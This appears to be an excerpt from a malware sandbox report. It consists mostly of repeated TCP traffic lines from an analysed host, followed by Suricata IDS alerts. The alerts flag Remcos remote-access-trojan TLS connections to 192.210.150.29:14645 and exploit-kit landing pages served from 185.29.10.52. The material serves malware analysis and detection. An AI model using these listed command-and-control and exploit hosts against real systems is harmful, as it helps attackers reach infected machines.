                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 192.210.150.29:14645
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 192.210.150.29:14645
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49168 -> 192.210.150.29:14645
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49169 -> 192.210.150.29:14645
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.29.10.52:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.29.10.52:80 -> 192.168.2.22:49163
